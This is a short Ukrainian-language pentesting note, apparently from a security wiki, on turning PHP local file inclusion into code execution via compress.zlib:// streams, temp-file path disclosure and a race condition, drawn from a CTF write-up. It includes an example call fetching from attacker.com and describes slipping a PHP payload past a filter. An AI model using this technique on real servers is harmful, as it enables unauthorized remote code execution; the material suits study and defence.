LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

compress.zlib:// та PHP_STREAM_PREFER_STDIO

Файл, відкритий за допомогою протоколу compress.zlib:// з прапором PHP_STREAM_PREFER_STDIO, може продовжувати записувати дані, які надходять до з'єднання пізніше, до того ж файлу.

Це означає, що виклик, такий як:

file_get_contents("compress.zlib://http://attacker.com/file")

Відправить запит на http://attacker.com/file, тоді сервер може відповісти на запит дійсною HTTP-відповіддю, підтримувати з'єднання відкритим і надіслати додаткові дані деякий час потому, які також будуть записані у файл.

Ви можете побачити цю інформацію в цій частині коду php-src у main/streams/cast.c:

/* Use a tmpfile and copy the old streams contents into it */

if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}

Умова гонки для RCE

Цей CTF був вирішений за допомогою попереднього трюку.

Зловмисник змусить сервер жертви відкрити з'єднання для читання файлу з сервера зловмисника за допомогою протоколу compress.zlib.

Поки це з'єднання існує, зловмисник екстрагує шлях до тимчасового файлу, що був створений (він витікає з сервера).

Поки з'єднання все ще відкрите, зловмисник використає LFI для завантаження тимчасового файлу, яким він керує.

Однак, на веб-сервері є перевірка, яка запобігає завантаженню файлів, що містять <?. Тому зловмисник зловживає умовою гонки. У з'єднанні, що все ще відкрите, зловмисник надішле PHP корисне навантаження ПІСЛЯ того, як веб-сервер перевірив, чи містить файл заборонені символи, але ДО того, як він завантажить його вміст.

Для отримання додаткової інформації перегляньте опис Умови гонки та CTF на https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer